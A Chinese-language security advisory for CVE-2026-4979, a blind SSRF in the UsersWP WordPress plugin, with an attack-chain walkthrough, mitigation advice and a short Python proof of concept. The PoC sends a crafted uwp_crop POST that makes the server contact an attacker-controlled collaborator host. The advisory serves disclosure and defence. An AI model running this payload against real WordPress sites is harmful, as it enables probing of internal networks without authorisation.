IPBUF安全漏洞报告
English
CVE-2026-4979 CVSS 5.0 中危

CVE-2026-4979 WordPress UsersWP插件盲SSRF漏洞

披露日期: 2026-04-11
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4979
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
5.0 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
UsersWP WordPress Plugin

相关标签

SSRFWordPressUsersWPBlind SSRFCVE-2026-4979

漏洞概述

WordPress插件UsersWP在1.2.58及之前版本中存在盲服务端请求伪造(SSRF)漏洞。该漏洞源于process_image_crop()方法对用户提供的URL缺乏严格的来源验证。攻击者可诱导服务器向任意内网或外网地址发起请求,从而扫描内部网络或访问敏感服务。

技术细节

该漏洞位于UsersWP插件的图片裁剪处理逻辑中。当服务器处理头像或横幅图像裁剪时,process_image_crop()方法接收用户通过POST参数uwp_crop提交的URL。虽然代码使用了esc_url()进行清理和wp_check_filetype()验证文件扩展名,但并未强制验证URL是否指向本地uploads目录。随后,该URL被传递给uwp_resizeThumbnailImage()函数,该函数利用PHP的getimagesize()和imagecreatefrom*()系列函数处理图像。由于这些PHP函数支持URL流包装器,服务器会自动解析用户提供的URL并发起HTTP请求。因此,拥有订阅者及以上权限的认证攻击者可利用此缺陷,构造包含恶意URL的POST请求,迫使WordPress服务器向攻击者控制的外部站点或内部网络资源发起请求,实现SSRF攻击。

攻击链分析

STEP 1
步骤1
攻击者在目标WordPress站点注册一个低权限账户(如订阅者Subscriber)并登录。
STEP 2
步骤2
攻击者向服务器发送POST请求,在uwp_crop参数中填入攻击者控制的URL或内网地址(如http://127.0.0.1:80)。
STEP 3
步骤3
服务器端process_image_crop()函数接收参数,经简单过滤后传递给PHP图片处理函数。
STEP 4
步骤4
PHP的getimagesize()或imagecreatefrom*()函数解析URL,WordPress服务器向指定目标发起HTTP请求。
STEP 5
步骤5
攻击者通过监控外部服务器的访问日志或分析响应时间,确认漏洞存在并获取内网信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-4979 (Blind SSRF in UsersWP Plugin) # This script requires a valid authenticated session (Subscriber level or higher). import requests target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_controlled_url = "http://burpcollaborator.net/poc" # Authenticate using WordPress session cookies cookies = { "wordpress_logged_in_xxx": "your_cookie_value_here" } # The vulnerable payload targeting the crop functionality payload_data = { "action": "uwp_avatar_crop", # The specific action triggering the vulnerability "uwp_crop": attacker_controlled_url # Malicious URL causing the SSRF } try: response = requests.post(target_url, data=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check your attacker-controlled server (" + attacker_controlled_url + ") for incoming HTTP requests from the target.") else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

UsersWP <= 1.2.58

防御指南

临时缓解措施
如果无法立即升级插件,建议通过Web应用防火墙(WAF)拦截包含外部URL域名的uwp_crop参数请求。同时,严格限制WordPress用户的注册权限,仅允许受信任用户注册,或禁用UsersWP插件的图片裁剪功能以降低风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表